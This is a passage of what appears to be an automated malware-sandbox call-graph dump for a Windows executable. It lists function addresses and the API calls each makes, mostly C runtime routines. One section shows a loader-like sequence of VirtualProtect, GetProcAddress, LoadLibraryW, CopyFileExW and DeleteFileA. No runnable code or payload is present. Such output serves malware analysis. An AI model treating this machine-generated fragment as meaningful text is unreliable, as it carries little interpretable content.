11370 40ecfb 11364->11370 11374 406fa4 __crtLCMapStringA_stat 68 API calls 11364->11374 11367 406fa4 __crtLCMapStringA_stat 68 API calls 11365->11367 11369 40ed68 11367->11369 11377 406fa4 __crtLCMapStringA_stat 68 API calls 11369->11377 11379 406fa4 __crtLCMapStringA_stat 68 API calls 11370->11379 11389 40ed1c 11370->11389 11371 406fa4 __crtLCMapStringA_stat 68 API calls 11380 40ed29 11371->11380 11372 40eded 11375 406fa4 __crtLCMapStringA_stat 68 API calls 11372->11375 11373 406fa4 __crtLCMapStringA_stat 68 API calls 11373->11384 11376 40ecf0 11374->11376 11381 40edf3 11375->11381 11390 4130c0 11376->11390 11383 40ed76 11377->11383 11378 406fa4 68 API calls __crtLCMapStringA_stat 11378->11384 11385 40ed11 11379->11385 11386 406fa4 __crtLCMapStringA_stat 68 API calls 11380->11386 11381->11337 11387 406fa4 __crtLCMapStringA_stat 68 API calls 11383->11387 11384->11372 11384->11378 11406 41307b 11385->11406 11386->11361 11387->11363 11389->11371 11391 4130cd 11390->11391 11405 41314a 11390->11405 11392 4130de 11391->11392 11393 406fa4 __crtLCMapStringA_stat 68 API calls 11391->11393 11394 4130f0 11392->11394 11395 406fa4 __crtLCMapStringA_stat 68 API calls 11392->11395 11393->11392 11396 413102 11394->11396 11398 406fa4 __crtLCMapStringA_stat 68 API calls 11394->11398 11395->11394 11397 413114 11396->11397 11399 406fa4 __crtLCMapStringA_stat 68 API calls 11396->11399 11400 413126 11397->11400 11401 406fa4 __crtLCMapStringA_stat 68 API calls 11397->11401 11398->11396 11399->11397 11402 413138 11400->11402 11403 406fa4 __crtLCMapStringA_stat 68 API calls 11400->11403 11401->11400 11404 406fa4 __crtLCMapStringA_stat 68 API calls 11402->11404 11402->11405 11403->11402 11404->11405 11405->11370 11407 413088 11406->11407 11413 4130bc 11406->11413 11408 413098 11407->11408 11409 406fa4 __crtLCMapStringA_stat 68 API calls 11407->11409 11410 4130aa 11408->11410 11411 406fa4 __crtLCMapStringA_stat 68 API calls 11408->11411 11409->11408 11412 406fa4 __crtLCMapStringA_stat 68 API calls 11410->11412 11410->11413 11411->11410 11412->11413 11413->11389 11415 412ef7 11414->11415 11416 40eda1 11414->11416 11417 406fa4 __crtLCMapStringA_stat 68 API calls 11415->11417 11416->11373 11418 412eff 11417->11418 11419 406fa4 __crtLCMapStringA_stat 68 API calls 11418->11419 11420 412f07 11419->11420 11421 406fa4 __crtLCMapStringA_stat 68 API calls 11420->11421 11422 412f0f 11421->11422 11423 406fa4 __crtLCMapStringA_stat 68 API calls 11422->11423 11424 412f17 11423->11424 11425 406fa4 __crtLCMapStringA_stat 68 API calls 11424->11425 11426 412f1f 11425->11426 11427 406fa4 __crtLCMapStringA_stat 68 API calls 11426->11427 11428 412f27 11427->11428 11429 406fa4 __crtLCMapStringA_stat 68 API calls 11428->11429 11430 412f2e 11429->11430 11431 406fa4 __crtLCMapStringA_stat 68 API calls 11430->11431 11432 412f36 11431->11432 11433 406fa4 __crtLCMapStringA_stat 68 API calls 11432->11433 11434 412f3e 11433->11434 11435 406fa4 __crtLCMapStringA_stat 68 API calls 11434->11435 11436 412f46 11435->11436 11437 406fa4 __crtLCMapStringA_stat 68 API calls 11436->11437 11438 412f4e 11437->11438 11439 406fa4 __crtLCMapStringA_stat 68 API calls 11438->11439 11440 412f56 11439->11440 11441 406fa4 __crtLCMapStringA_stat 68 API calls 11440->11441 11442 412f5e 11441->11442 11443 406fa4 __crtLCMapStringA_stat 68 API calls 11442->11443 11444 412f66 11443->11444 11445 406fa4 __crtLCMapStringA_stat 68 API calls 11444->11445 11446 412f6e 11445->11446 11447 406fa4 __crtLCMapStringA_stat 68 API calls 11446->11447 11448 412f76 11447->11448 11449 406fa4 __crtLCMapStringA_stat 68 API calls 11448->11449 11450 412f81 11449->11450 11451 406fa4 __crtLCMapStringA_stat 68 API calls 11450->11451 11452 412f89 11451->11452 11453 406fa4 __crtLCMapStringA_stat 68 API calls 11452->11453 11454 412f91 11453->11454 11455 406fa4 __crtLCMapStringA_stat 68 API calls 11454->11455 11456 412f99 11455->11456 11457 406fa4 __crtLCMapStringA_stat 68 API calls 11456->11457 11458 412fa1 11457->11458 11459 406fa4 __crtLCMapStringA_stat 68 API calls 11458->11459 11460 412fa9 11459->11460 11461 406fa4 __crtLCMapStringA_stat 68 API calls 11460->11461 11462 412fb1 11461->11462 11463 406fa4 __crtLCMapStringA_stat 68 API calls 11462->11463 11464 412fb9 11463->11464 11465 406fa4 __crtLCMapStringA_stat 68 API calls 11464->11465 11466 412fc1 11465->11466 11467 406fa4 __crtLCMapStringA_stat 68 API calls 11466->11467 11468 412fc9 11467->11468 11469 406fa4 __crtLCMapStringA_stat 68 API calls 11468->11469 11470 412fd1 11469->11470 11471 406fa4 __crtLCMapStringA_stat 68 API calls 11470->11471 11472 412fd9 11471->11472 11473 406fa4 __crtLCMapStringA_stat 68 API calls 11472->11473 11474 412fe1 11473->11474 11475 406fa4 __crtLCMapStringA_stat 68 API calls 11474->11475 11476 412fe9 11475->11476 11477 406fa4 __crtLCMapStringA_stat 68 API calls 11476->11477 11478 412ff1 11477->11478 11479 406fa4 __crtLCMapStringA_stat 68 API calls 11478->11479 11480 412ff9 11479->11480 11481 406fa4 __crtLCMapStringA_stat 68 API calls 11480->11481 11482 413007 11481->11482 11483 406fa4 __crtLCMapStringA_stat 68 API calls 11482->11483 11484 413012 11483->11484 11485 406fa4 __crtLCMapStringA_stat 68 API calls 11484->11485 11486 41301d 11485->11486 11487 406fa4 __crtLCMapStringA_stat 68 API calls 11486->11487 11488 413028 11487->11488 11489 406fa4 __crtLCMapStringA_stat 68 API calls 11488->11489 11490 413033 11489->11490 11491 406fa4 __crtLCMapStringA_stat 68 API calls 11490->11491 11492 41303e 11491->11492 11493 406fa4 __crtLCMapStringA_stat 68 API calls 11492->11493 11494 413049 11493->11494 11495 406fa4 __crtLCMapStringA_stat 68 API calls 11494->11495 11496 413054 11495->11496 11497 406fa4 __crtLCMapStringA_stat 68 API calls 11496->11497 11498 41305f 11497->11498 11499 406fa4 __crtLCMapStringA_stat 68 API calls 11498->11499 11500 41306a 11499->11500 11501 406fa4 __crtLCMapStringA_stat 68 API calls 11500->11501 11501->11416 11502->11345 11506 40d61f LeaveCriticalSection 11503->11506 11505 40e895 11505->11330 11506->11505 11508 40eb04 __lseeki64 11507->11508 11509 409042 __getptd 68 API calls 11508->11509 11510 40eb0d 11509->11510 11511 40e7f3 _LocaleUpdate::_LocaleUpdate 70 API calls 11510->11511 11512 40eb17 11511->11512 11538 40e897 11512->11538 11515 410b5a __malloc_crt 68 API calls 11516 40eb38 11515->11516 11517 40ec57 __lseeki64 11516->11517 11545 40e913 11516->11545 11517->11283 11520 40ec64 11520->11517 11524 40ec77 11520->11524 11526 406fa4 __crtLCMapStringA_stat 68 API calls 11520->11526 11521 40eb68 InterlockedDecrement 11522 40eb78 11521->11522 11523 40eb89 InterlockedIncrement 11521->11523 11522->11523 11528 406fa4 __crtLCMapStringA_stat 68 API calls 11522->11528 11523->11517 11525 40eb9f 11523->11525 11527 407567 _strcpy_s 68 API calls 11524->11527 11525->11517 11530 40d6f9 __lock 68 API calls 11525->11530 11526->11524 11527->11517 11529 40eb88 11528->11529 11529->11523 11532 40ebb3 InterlockedDecrement 11530->11532 11533 40ec42 InterlockedIncrement 11532->11533 11534 40ec2f 11532->11534 11555 40ec59 11533->11555 11534->11533 11536 406fa4 __crtLCMapStringA_stat 68 API calls 11534->11536 11537 40ec41 11536->11537 11537->11533 11539 407915 _LocaleUpdate::_LocaleUpdate 78 API calls 11538->11539 11540 40e8ab 11539->11540 11541 40e8d4 11540->11541 11542 40e8b6 GetOEMCP 11540->11542 11543 40e8d9 GetACP 11541->11543 11544 40e8c6 11541->11544 11542->11544 11543->11544 11544->11515 11544->11517 11546 40e897 getSystemCP 80 API calls 11545->11546 11547 40e933 11546->11547 11548 40e93e setSBCS 11547->11548 11551 40e982 IsValidCodePage 11547->11551 11554 40e9a7 _memset __setmbcp_nolock 11547->11554 11549 406dab __cftoe_l 5 API calls 11548->11549 11550 40eaf6 11549->11550 11550->11520 11550->11521 11551->11548 11552 40e994 GetCPInfo 11551->11552 11552->11548 11552->11554 11558 40e660 GetCPInfo 11554->11558 11691 40d61f LeaveCriticalSection 11555->11691 11557 40ec60 11557->11517 11559 40e746 11558->11559 11561 40e694 _memset 11558->11561 11563 406dab __cftoe_l 5 API calls 11559->11563 11568 412ea4 11561->11568 11565 40e7f1 11563->11565 11565->11554 11567 412ca5 ___crtLCMapStringA 103 API calls 11567->11559 11569 407915 _LocaleUpdate::_LocaleUpdate 78 API calls 11568->11569 11570 412eb7 11569->11570 11578 412cea 11570->11578 11573 412ca5 11574 407915 _LocaleUpdate::_LocaleUpdate 78 API calls 11573->11574 11575 412cb8 11574->11575 11644 412900 11575->11644 11579 412d36 11578->11579 11580 412d0b GetStringTypeW 11578->11580 11581 412d23 11579->11581 11583 412e1d 11579->11583 11580->11581 11582 412d2b GetLastError 11580->11582 11584 412d6f MultiByteToWideChar 11581->11584 11591 412e17 11581->11591 11582->11579 11606 41685b GetLocaleInfoA 11583->11606 11589 412d9c 11584->11589 11584->11591 11586 406dab __cftoe_l 5 API calls 11588 40e701 11586->11588 11588->11573 11593 412db1 _memset __crtLCMapStringA_stat 11589->11593 11594 406eda _malloc 68 API calls 11589->11594 11590 412e6e GetStringTypeA 11590->11591 11592 412e89 11590->11592 11591->11586 11597 406fa4 __crtLCMapStringA_stat 68 API calls 11592->11597 11593->11591 11596 412dea MultiByteToWideChar 11593->11596 11594->11593 11599 412e11 11596->11599 11600 412e00 GetStringTypeW 11596->11600 11597->11591 11602 4128e0 11599->11602 11600->11599 11603 4128ec 11602->11603 11604 4128fd 11602->11604 11603->11604 11605 406fa4 __crtLCMapStringA_stat 68 API calls 11603->11605 11604->11591 11605->11604 11607 416889 11606->11607 11608 41688e 11606->11608 11610 406dab __cftoe_l 5 API calls 11607->11610 11637 4128ca 11608->11637 11611 412e41 11610->11611 11611->11590 11611->11591 11612 4168a4 11611->11612 11613 41696e 11612->11613 11614 4168e4 GetCPInfo 11612->11614 11617 406dab __cftoe_l 5 API calls 11613->11617 11615 416959 MultiByteToWideChar 11614->11615 11616 4168fb 11614->11616 11615->11613 11621 416914 _strlen 11615->11621 11616->11615 11618 416901 GetCPInfo 11616->11618 11619 412e62 11617->11619 11618->11615 11620 41690e 11618->11620 11619->11590 11619->11591 11620->11615 11620->11621 11622 406eda _malloc 68 API calls 11621->11622 11626 416946 _memset __crtLCMapStringA_stat 11621->11626 11622->11626 11623 4169a3 MultiByteToWideChar 11624 4169bb 11623->11624 11625 4169da 11623->11625 11628 4169c2 WideCharToMultiByte 11624->11628 11629 4169df 11624->11629 11627 4128e0 __freea 68 API calls 11625->11627 11626->11613 11626->11623 11627->11613 11628->11625 11630 4169ea WideCharToMultiByte 11629->11630 11631 4169fe 11629->11631 11630->11625 11630->11631 11632 410b9f __calloc_crt 68 API calls 11631->11632 11633 416a06 11632->11633 11633->11625 11634 416a0f WideCharToMultiByte 11633->11634 11634->11625 11635 416a21 11634->11635 11636 406fa4 __crtLCMapStringA_stat 68 API calls 11635->11636 11636->11625 11640 412834 11637->11640 11641 41284d 11640->11641 11642 412605 strtoxl 92 API calls 11641->11642 11643 41285a 11642->11643 11643->11607 11645 412921 LCMapStringW 11644->11645 11648 41293c 11644->11648 11646 412944 GetLastError 11645->11646 11645->11648 11646->11648 11647 412b3a 11650 41685b ___ansicp 92 API calls 11647->11650 11648->11647 11649 412996 11648->11649 11651 4129af MultiByteToWideChar 11649->11651 11675 412b31 11649->11675 11653 412b62 11650->11653 11657 4129dc 11651->11657 11651->11675 11652 406dab __cftoe_l 5 API calls 11654 40e721 11652->11654 11655 412c56 LCMapStringA 11653->11655 11656 412b7b 11653->11656 11653->11675 11654->11567 11690 412bb2 11655->11690 11658 4168a4 ___convertcp 75 API calls 11656->11658 11662 406eda _malloc 68 API calls 11657->11662 11670 4129f5 __crtLCMapStringA_stat 11657->11670 11663 412b8d 11658->11663 11659 412a2d MultiByteToWideChar 11660 412a46 LCMapStringW 11659->11660 11685 412b28 11659->11685 11664 412a67 11660->11664 11660->11685 11661 412c7d 11673 406fa4 __crtLCMapStringA_stat 68 API calls 11661->11673 11661->11675 11662->11670 11666 412b97 LCMapStringA 11663->11666 11663->11675 11668 412a70 11664->11668 11669 412a99 11664->11669 11665 406fa4 __crtLCMapStringA_stat 68 API calls 11665->11661 11671 412bb9 11666->11671 11666->11690 11667 4128e0 __freea 68 API calls 11667->11675 11674 412a82 LCMapStringW 11668->11674 11668->11685 11672 412ab4 __crtLCMapStringA_stat 11669->11672 11680 406eda _malloc 68 API calls 11669->11680 11670->11659 11670->11675 11679 406eda _malloc 68 API calls 11671->11679 11681 412bca _memset __crtLCMapStringA_stat 11671->11681 11676 412ae8 LCMapStringW 11672->11676 11672->11685 11673->11675 11674->11685 11675->11652 11677 412b00 WideCharToMultiByte 11676->11677 11678 412b22 11676->11678 11677->11678 11682 4128e0 __freea 68 API calls 11678->11682 11679->11681 11680->11672 11683 412c08 LCMapStringA 11681->11683 11681->11690 11682->11685 11686 412c24 11683->11686 11687 412c28 11683->11687 11685->11667 11689 4128e0 __freea 68 API calls 11686->11689 11688 4168a4 ___convertcp 75 API calls 11687->11688 11688->11686 11689->11690 11690->11661 11690->11665 11691->11557 11693 40847d 11692->11693 11694 408d7b __encode_pointer 7 API calls 11693->11694 11695 408495 11693->11695 11694->11693 11695->10818 11699 409403 11696->11699 11698 40944c 11698->10820 11700 40940f __lseeki64 11699->11700 11707 40a428 11700->11707 11706 409430 __lseeki64 11706->11698 11708 40d6f9 __lock 68 API calls 11707->11708 11709 409414 11708->11709 11710 409318 11709->11710 11711 408df6 __decode_pointer 6 API calls 11710->11711 11712 40932c 11711->11712 11713 408df6 __decode_pointer 6 API calls 11712->11713 11714 40933c 11713->11714 11723 4093bf 11714->11723 11730 410c8b 11714->11730 11716 408d7b __encode_pointer 7 API calls 11719 4093b4 11716->11719 11717 40935a 11718 40937e 11717->11718 11726 4093a6 11717->11726 11743 410beb 11717->11743 11722 410beb __realloc_crt 74 API calls 11718->11722 11718->11723 11724 409394 11718->11724 11721 408d7b __encode_pointer 7 API calls 11719->11721 11721->11723 11722->11724 11727 409439 11723->11727 11724->11723 11725 408d7b __encode_pointer 7 API calls 11724->11725 11725->11726 11726->11716 11792 40a431 11727->11792 11731 410c97 __lseeki64 11730->11731 11732 410cc4 11731->11732 11733 410ca7 11731->11733 11734 410d05 HeapSize 11732->11734 11736 40d6f9 __lock 68 API calls 11732->11736 11735 407567 _strcpy_s 68 API calls 11733->11735 11739 410cbc __lseeki64 11734->11739 11737 410cac 11735->11737 11740 410cd4 ___sbh_find_block 11736->11740 11738 406332 _strcpy_s 6 API calls 11737->11738 11738->11739 11739->11717 11748 410d25 11740->11748 11747 410bf4 11743->11747 11745 410c33 11745->11718 11746 410c14 Sleep 11746->11747 11747->11745 11747->11746 11752 415aa9 11747->11752 11751 40d61f LeaveCriticalSection 11748->11751 11750 410d00 11750->11734 11750->11739 11751->11750 11753 415ab5 __lseeki64 11752->11753 11754 415aca 11753->11754 11755 415abc 11753->11755 11757 415ad1 11754->11757 11758 415add 11754->11758 11756 406eda _malloc 68 API calls 11755->11756 11760 415ac4 __dosmaperr __lseeki64 11756->11760 11759 406fa4 __crtLCMapStringA_stat 68 API calls 11757->11759 11762 415aea _memcpy_s ___sbh_resize_block ___sbh_find_block 11758->11762 11763 415c4f 11758->11763 11759->11760 11760->11747 11761 415c82 11765 409465 __calloc_impl 6 API calls 11761->11765 11762->11760 11762->11761 11766 40d6f9 __lock 68 API calls 11762->11766 11776 415b75 HeapAlloc 11762->11776 11778 415bca HeapReAlloc 11762->11778 11780 40df0b ___sbh_alloc_block 5 API calls 11762->11780 11781 415c35 11762->11781 11782 409465 __calloc_impl 6 API calls 11762->11782 11785 415c18 11762->11785 11787 40d75c __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 11762->11787 11788 415bed 11762->11788 11763->11761 11764 415c54 HeapReAlloc 11763->11764 11769 415ca6 11763->11769 11770 409465 __calloc_impl 6 API calls 11763->11770 11772 415c9c 11763->11772 11764->11760 11764->11763 11767 415c88 11765->11767 11766->11762 11768 407567 _strcpy_s 68 API calls 11767->11768 11768->11760 11769->11760 11771 407567 _strcpy_s 68 API calls 11769->11771 11770->11763 11773 415caf GetLastError 11771->11773 11775 407567 _strcpy_s 68 API calls 11772->11775 11773->11760 11777 415c1d 11775->11777 11776->11762 11777->11760 11779 415c22 GetLastError 11777->11779 11778->11762 11779->11760 11780->11762 11781->11760 11783 407567 _strcpy_s 68 API calls 11781->11783 11782->11762 11784 415c42 11783->11784 11784->11760 11784->11773 11786 407567 _strcpy_s 68 API calls 11785->11786 11786->11777 11787->11762 11791 40d61f LeaveCriticalSection 11788->11791 11790 415bf4 11790->11762 11791->11790 11795 40d61f LeaveCriticalSection 11792->11795 11794 40943e 11794->11706 11795->11794 11797 40456e 11796->11797 11798 40458d GetModuleHandleW 11797->11798 11799 40459d 11797->11799 11798->11797 11884 40454b GlobalAlloc 11799->11884 11801 4045a2 11802 4045d7 11801->11802 11803 4045ac 11801->11803 11805 4045ef 8 API calls 11802->11805 11806 40463b 11802->11806 11803->11802 11807 4045be GetEnvironmentStringsW InterlockedDecrement 11803->11807 11887 4042a3 11803->11887 11805->11802 11808 40464c GetModuleHandleW 11806->11808 11809 40465f GetModuleHandleA 11806->11809 11810 404674 GetProcAddress 11806->11810 11807->11803 11808->11806 11809->11806 11811 40468f 11810->11811 11813 4046a2 11811->11813 11885 40444d GetModuleHandleA GetProcAddress VirtualProtect 11811->11885 11891 4041cf 11813->11891 11815 4046b8 11816 4046c3 InterlockedIncrement 11815->11816 11817 4046d5 11815->11817 11818 4046e3 11815->11818 11816->11815 11817->11815 11886 404008 LoadLibraryW 11818->11886 11820 4046e8 11821 4046f8 20 API calls 11820->11821 11822 4047d3 11820->11822 11821->11822 11822->10841 11897 406aba 11823->11897 11826 406a9d 12142 406a17 11826->12142 11828 404806 11829 4069e7 DeleteFileA 11828->11829 11830 406a01 11829->11830 11831 4069f9 GetLastError 11829->11831 11832 406a13 11830->11832 11833 40758d __dosmaperr 68 API calls 11830->11833 11831->11830 11832->10840 11834 406a0d 11833->11834 11834->10840 11836 405737 std::_String_base::_Xlen __EH_prolog 11835->11836 12168 404f8d 11836->12168 11841 4053ae 11842 4053bc std::_String_base::_Xlen 11841->11842 11843 404d30 std::_String_base::_Xlen 68 API calls 11842->11843 11844 4053ce 11843->11844 12338 405200 11844->12338 11847 405bde 11848 405bed 11847->11848 11851 405bfc 11848->11851 12351 40512d 11848->12351 11851->10849 11854 404d30 std::_String_base::_Xlen 68 API calls 11853->11854 11855 40483e 11854->11855 11855->10852 11857 405c30 __EH_prolog 11856->11857 11858 4051dc std::bad_exception::bad_exception 76 API calls 11857->11858 11859 405c4d 11858->11859 11860 40512d 6 API calls 11859->11860 11861 405c5c 11860->11861 11862 4051a2 6 API calls 11861->11862 11863 405c6c 11862->11863 12499 405866 11863->12499 11866 4051a2 6 API calls 11867 405c89 11866->11867 12510 405bc6 11867->12510 11870 404f83 Mailbox 68 API calls 11871 404859 11870->11871 11871->10856 11873 4068ef 11872->11873 11876 4068f6 11872->11876 11874 40a8d6 __NMSG_WRITE 68 API calls 11873->11874 11874->11876 12535 40a719 11876->12535 11878 406907 _memset 11880 4069df 11878->11880 11882 40699f SetUnhandledExceptionFilter UnhandledExceptionFilter 11878->11882 12559 40a642 11880->12559 11882->11880 11884->11801 11885->11811 11886->11820 11888 4042b0 __write_nolock 11887->11888 11889 40441c 11888->11889 11890 4042bd 27 API calls 11888->11890 11889->11803 11890->11889 11892 4041e8 ReadConsoleOutputCharacterA 11891->11892 11895 404209 11891->11895 11892->11895 11893 40429c 11893->11815 11894 404229 CopyFileExW GetConsoleAliasesLengthW 11894->11895 11895->11893 11895->11894 11896 40424d 6 API calls 11895->11896 11896->11895 11898 406ae7 11897->11898 11899 406aca 11897->11899 11898->11899 11900 406aee 11898->11900 11901 407567 _strcpy_s 68 API calls 11899->11901 11908 40bf00 11900->11908 11903 406acf 11901->11903 11905 406332 _strcpy_s 6 API calls 11903->11905 11906 4047fd 11905->11906 11906->11826 11909 407915 _LocaleUpdate::_LocaleUpdate 78 API calls 11908->11909 11910 40bf67 11909->11910 11911 40bf6b 11910->11911 11924 40bfac __output_l __aulldvrm _strlen 11910->11924 11949 411901 11910->11949 11912 407567 _strcpy_s 68 API calls 11911->11912 11914 40bf70 11912->11914 11915 406332 _strcpy_s 6 API calls 11914->11915 11916 40bf82 11915->11916 11917 406dab __cftoe_l 5 API calls 11916->11917 11918 406b15 11917->11918 11918->11906 11928 40bcf6 11918->11928 11920 40be5a 102 API calls _write_string 11920->11924 11921 406fa4 __crtLCMapStringA_stat 68 API calls 11921->11924 11922 408df6 6 API calls __decode_pointer 11922->11924 11923 410b5a __malloc_crt 68 API calls 11923->11924 11924->11911 11924->11916 11924->11920 11924->11921 11924->11922 11924->11923 11925 40be8d 102 API calls _write_multi_char 11924->11925 11926 40beb3 102 API calls _write_string 11924->11926 11927 412550 80 API calls __cftof 11924->11927 11955 4118b6 11924->11955 11925->11924 11926->11924 11927->11924 11929 411901 __fileno 68 API calls 11928->11929 11930 40bd06 11929->11930 11931 40bd11 11930->11931 11932 40bd28 11930->11932 11933 407567 _strcpy_s 68 API calls 11931->11933 11934 40bd2c 11932->11934 11936 40bd39 __flsbuf 11932->11936 11937 40bd16 11933->11937 11935 407567 _strcpy_s 68 API calls 11934->11935 11935->11937 11936->11937 11945 40bd8f 11936->11945 11948 40bd9a 11936->11948 11958 41236a 11936->11958 11937->11906 11938 40be29 11940 412245 __locking 102 API calls 11938->11940 11939 40bda9 11941 40bdc0 11939->11941 11944 40bddd 11939->11944 11940->11937 11970 412245 11941->11970 11944->11937 11995 4119f9 11944->11995 11945->11948 11967 412321 11945->11967 11948->11938 11948->11939 11950 411910 11949->11950 11951 411925 11949->11951 11952 407567 _strcpy_s 68 API calls 11950->11952 11951->11924 11953 411915 11952->11953 11954 406332 _strcpy_s 6 API calls 11953->11954 11954->11951 11956 407915 _LocaleUpdate::_LocaleUpdate 78 API calls 11955->11956 11957 4118c9 11956->11957 11957->11924 11959 412377 11958->11959 11961 412386 11958->11961 11960 407567 _strcpy_s 68 API calls 11959->11960 11963 41237c 11960->11963 11962 407567 _strcpy_s 68 API calls 11961->11962 11964 4123aa 11961->11964 11965 41239a 11962->11965 11963->11945 11964->11945 11966 406332 _strcpy_s 6 API calls 11965->11966 11966->11964 11968 410b5a __malloc_crt 68 API calls 11967->11968 11969 412336 11968->11969 11969->11948 11971 412251 __lseeki64 11970->11971 11972 412274 11971->11972 11973 412259 11971->11973 11975 412282 11972->11975 11978 4122c3 11972->11978 12027 40757a 11973->12027 11977 40757a __lseeki64 68 API calls 11975->11977 11980 412287 11977->11980 12030 4166cf 11978->12030 11979 407567 _strcpy_s 68 API calls 11988 412266 __lseeki64 11979->11988 11982 407567 _strcpy_s 68 API calls 11980->11982 11984 41228e 11982->11984 11983 4122c9 11985 4122d6 11983->11985 11986 4122ec 11983->11986 11987 406332 _strcpy_s 6 API calls 11984->11987 12040 411b12 11985->12040 11990 407567 _strcpy_s 68 API calls 11986->11990 11987->11988 11988->11937 11992 4122f1 11990->11992 11991 4122e4 12099 412317 11991->12099 11993 40757a __lseeki64 68 API calls 11992->11993 11993->11991 11996 411a05 __lseeki64 11995->11996 11997 411a32 11996->11997 11998 411a16 11996->11998 12000 411a40 11997->12000 12001 411a61 11997->12001 11999 40757a __lseeki64 68 API calls 11998->11999 12003 411a1b 11999->12003 12002 40757a __lseeki64 68 API calls 12000->12002 12005 411a81 12001->12005 12006 411aa7 12001->12006 12004 411a45 12002->12004 12007 407567 _strcpy_s 68 API calls 12003->12007 12009 407567 _strcpy_s 68 API calls 12004->12009 12010 40757a __lseeki64 68 API calls 12005->12010 12008 4166cf ___lock_fhandle 69 API calls 12006->12008 12011 411a23 __lseeki64 12007->12011 12012 411aad 12008->12012 12013 411a4c 12009->12013 12014 411a86 12010->12014 12011->11937 12015 411ad6 12012->12015 12016 411aba 12012->12016 12017 406332 _strcpy_s 6 API calls 12013->12017 12018 407567 _strcpy_s 68 API calls 12014->12018 12020 407567 _strcpy_s 68 API calls 12015->12020 12019 411974 __lseeki64_nolock 70 API calls 12016->12019 12017->12011 12021 411a8d 12018->12021 12024 411acb 12019->12024 12022 411adb 12020->12022 12023 406332 _strcpy_s 6 API calls 12021->12023 12025 40757a __lseeki64 68 API calls 12022->12025 12023->12011 12138 411b08 12024->12138 12025->12024 12028 408fc9 __getptd_noexit 68 API calls 12027->12028 12029 40757f 12028->12029 12029->11979 12031 4166db __lseeki64 12030->12031 12032 416736 12031->12032 12035 40d6f9 __lock 68 API calls 12031->12035 12033 416758 __lseeki64 12032->12033 12034 41673b EnterCriticalSection 12032->12034 12033->11983 12034->12033 12036 416707 12035->12036 12037 41671e 12036->12037 12038 410ffa __ioinit InitializeCriticalSectionAndSpinCount 12036->12038 12102 416766 12037->12102 12038->12037 12041 411b21 __write_nolock 12040->12041 12042 411b53 12041->12042 12043 411b7a 12041->12043 12073 411b48 12041->12073 12045 40757a __lseeki64 68 API calls 12042->12045 12046 411be2 12043->12046 12047 411bbc 12043->12047 12044 406dab __cftoe_l 5 API calls 12048 412243 12044->12048 12049 411b58 12045->12049 12051 411bf6 12046->12051 12106 411974 12046->12106 12050 40757a __lseeki64 68 API calls 12047->12050 12048->11991 12052 407567 _strcpy_s 68 API calls 12049->12052 12053 411bc1 12050->12053 12056 41236a __write_nolock 68 API calls 12051->12056 12055 411b5f 12052->12055 12058 407567 _strcpy_s 68 API calls 12053->12058 12059 406332 _strcpy_s 6 API calls 12055->12059 12057 411c01 12056->12057 12060 411ea7 12057->12060 12065 409042 __getptd 68 API calls 12057->12065 12061 411bca 12058->12061 12059->12073 12063 411eb7 12060->12063 12064 412176 WriteFile 12060->12064 12062 406332 _strcpy_s 6 API calls 12061->12062 12062->12073 12066 411f95 12063->12066 12088 411ecb 12063->12088 12068 411e89 12064->12068 12069 4121a9 GetLastError 12064->12069 12067 411c1c GetConsoleMode 12065->12067 12087 412075 12066->12087 12091 411fa4 12066->12091 12067->12060 12071 411c47 12067->12071 12070 4121f4 12068->12070 12068->12073 12075 4121c7 12068->12075 12069->12068 12070->12073 12074 407567 _strcpy_s 68 API calls 12070->12074 12071->12060 12072 411c59 GetConsoleCP 12071->12072 12072->12068 12096 411c7c 12072->12096 12073->12044 12077 412217 12074->12077 12079 4121d2 12075->12079 12080 4121e6 12075->12080 12076 411f39 WriteFile 12076->12069 12076->12088 12085 40757a __lseeki64 68 API calls 12077->12085 12078 4120db WideCharToMultiByte 12078->12069 12082 412112 WriteFile 12078->12082 12081 407567 _strcpy_s 68 API calls 12079->12081 12119 40758d 12080->12119 12089 4121d7 12081->12089 12086 412149 GetLastError 12082->12086 12082->12087 12083 412019 WriteFile 12083->12069 12083->12091 12085->12073 12086->12087 12087->12068 12087->12070 12087->12078 12087->12082 12088->12068 12088->12070 12088->12076 12090 40757a __lseeki64 68 API calls 12089->12090 12090->12073 12091->12068 12091->12070 12091->12083 12093 41189c 80 API calls __fassign 12093->12096 12094 411d28 WideCharToMultiByte 12094->12068 12095 411d59 WriteFile 12094->12095 12095->12069 12095->12096 12096->12068 12096->12069 12096->12093 12096->12094 12097 416796 11 API calls __putwch_nolock 12096->12097 12098 411dad WriteFile 12096->12098 12116 4118ee 12096->12116 12097->12096 12098->12069 12098->12096 12137 41676f LeaveCriticalSection 12099->12137 12101 41231f 12101->11988 12105 40d61f LeaveCriticalSection 12102->12105 12104 41676d 12104->12032 12105->12104 12124 416658 12106->12124 12108 411992 12109 4119ab SetFilePointer 12108->12109 12110 41199a 12108->12110 12112 4119c3 GetLastError 12109->12112 12114 41199f 12109->12114 12111 407567 _strcpy_s 68 API calls 12110->12111 12111->12114 12113 4119cd 12112->12113 12112->12114 12115 40758d __dosmaperr 68 API calls 12113->12115 12114->12051 12115->12114 12117 4118b6 __isleadbyte_l 78 API calls 12116->12117 12118 4118fd 12117->12118 12118->12096 12120 40757a __lseeki64 68 API calls 12119->12120 12121 407598 __dosmaperr 12120->12121 12122 407567 _strcpy_s 68 API calls 12121->12122 12123 4075ab 12122->12123 12123->12073 12125 416665 12124->12125 12128 41667d 12124->12128 12126 40757a __lseeki64 68 API calls 12125->12126 12127 41666a 12126->12127 12130 407567 _strcpy_s 68 API calls 12127->12130 12129 40757a __lseeki64 68 API calls 12128->12129 12131 4166c2 12128->12131 12132 4166ab 12129->12132 12133 416672 12130->12133 12131->12108 12134 407567 _strcpy_s 68 API calls 12132->12134 12133->12108 12135 4166b2 12134->12135 12136 406332 _strcpy_s 6 API calls 12135->12136 12136->12131 12137->12101 12141 41676f LeaveCriticalSection 12138->12141 12140 411b10 12140->12011 12141->12140 12143 406a23 __lseeki64 12142->12143 12144 406a31 12143->12144 12145 406a4e __flsbuf 12143->12145 12146 407567 _strcpy_s 68 API calls 12144->12146 12153 40abd2 12145->12153 12147 406a36 12146->12147 12149 406332 _strcpy_s 6 API calls 12147->12149 12150 406a46 __lseeki64 12149->12150 12150->11828 12151 406a5a __flsbuf 12158 406a8e 12151->12158 12154 40abf5 EnterCriticalSection 12153->12154 12155 40abdf 12153->12155 12154->12151 12156 40d6f9 __lock 68 API calls 12155->12156 12157 40abe8 12156->12157 12157->12151 12159 406a93 __flsbuf 12158->12159 12162 40ac40 12159->12162 12161 406a9a 12161->12150 12163 40ac50 